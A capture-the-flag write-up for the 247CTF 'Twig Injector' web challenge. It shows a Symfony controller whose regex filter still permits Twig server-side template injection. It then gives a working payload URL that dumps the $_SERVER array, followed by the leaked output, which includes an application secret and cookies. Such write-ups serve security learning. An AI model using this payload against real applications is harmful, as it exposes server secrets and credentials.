The Twig Injector (web)
Hugo takes double curly braces { { (without whitespace in between) as a shortcode. Please delete the whitespace there when you try to use the command.
Intro
Can you abuse the Twig injector service to gain access to the flag hidden in the $_SERVER array?
Source
The regular expression /[^{\.}a-z\|\_]/ is used in the inject() method to remove any characters from the “inject” query parameter that are not letters (a-z), dots (.), curly braces ({ }), vertical bars (|), or underscores (_).
<?php
namespace App\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\Routing\Annotation\Route;
use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
class ChallengeController extends AbstractController
{
/**
* @Route("/inject")
*/
public function inject(Request $request)
{
$inject = preg_replace('/[^{\.}a-z\|\_]/', '', $request->query->get('inject'));
$response = new Response($this->get('twig')->createTemplate("Welcome to the twig injector!\n${inject}")->render());
$response->headers->set('Content-Type', 'text/plain');
return $response;
}
/**
* @Route("/")
*/
public function index()
{
return new Response(highlight_file(__FILE__, true));
}
}
Solution
https://4cde81270944aaec.247ctf.com/inject?inject={ {%20app.request.server.all|json_encode|raw%20}}
The app.request.server.all|json_encode|raw part of the command is a Twig template expression that uses the json_encode filter to encode the $_SERVER array as JSON, and then uses the raw filter to output the JSON as-is.
When the application receives the curl request, it will evaluate the inject query parameter using the Twig template engine and include the resulting output, which should be the $_SERVER array encoded as JSON, in the response.
Note that the regular expression in the inject endpoint’s controller limits the characters that can be included in the inject query parameter. Therefore, you may need to modify the expression to conform to the allowed characters.
Welcome to the twig injector!
{"REDIRECT_STATUS":"200","HTTP_HOST":"4cde81270944aaec.247ctf.com","HTTP_X_REAL_IP":"193.105.127.7","HTTP_X_FORWARDED_FOR":"193.105.127.7","HTTP_X_FORWARDED_PROTO":"https","HTTP_CONNECTION":"Upgrade","HTTP_USER_AGENT":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/112.0","HTTP_ACCEPT":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8","HTTP_ACCEPT_LANGUAGE":"en-US,en;q=0.5","HTTP_ACCEPT_ENCODING":"gzip, deflate, br","HTTP_COOKIE":"__stripe_mid=1376bc02-ac8c-4781-b841-a14df422caff19b12a; __stripe_sid=ebca1aca-0d5b-4c03-8ce3-677ae2c3fbc11fa906","HTTP_UPGRADE_INSECURE_REQUESTS":"1","HTTP_SEC_FETCH_DEST":"document","HTTP_SEC_FETCH_MODE":"navigate","HTTP_SEC_FETCH_SITE":"none","HTTP_SEC_FETCH_USER":"?1","PATH":"\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin","SERVER_SIGNATURE":"","SERVER_SOFTWARE":"Apache","SERVER_NAME":"4cde81270944aaec.247ctf.com","SERVER_ADDR":"172.17.0.6","SERVER_PORT":"80","REMOTE_ADDR":"144.76.74.118","DOCUMENT_ROOT":"\/var\/www\/html\/public\/","REQUEST_SCHEME":"http","CONTEXT_PREFIX":"","CONTEXT_DOCUMENT_ROOT":"\/var\/www\/html\/public\/","SERVER_ADMIN":"[no address given]","SCRIPT_FILENAME":"\/var\/www\/html\/public\/index.php","REMOTE_PORT":"54980","REDIRECT_URL":"\/inject","REDIRECT_QUERY_STRING":"inject={ {%20app.request.server.all|json_encode|raw%20}}","GATEWAY_INTERFACE":"CGI\/1.1","SERVER_PROTOCOL":"HTTP\/1.1","REQUEST_METHOD":"GET","QUERY_STRING":"inject={ {%20app.request.server.all|json_encode|raw%20}}","REQUEST_URI":"\/inject?inject={ {%20app.request.server.all|json_encode|raw%20}}","SCRIPT_NAME":"\/index.php","PHP_SELF":"\/index.php","REQUEST_TIME_FLOAT":1683634160.257,"REQUEST_TIME":1683634160,"SYMFONY_ENV":"prod","APP_ENV":"prod","APP_DEBUG":"0","APP_SECRET":"9eb18d9411835ab9db43feaef980738f","APP_FLAG":"247CTF{xxxxxxxxxxxxxxxxxxxxxxxx}","SYMFONY_DOTENV_VARS":"SYMFONY_ENV,APP_ENV,APP_DEBUG,APP_SECRET,APP_FLAG"}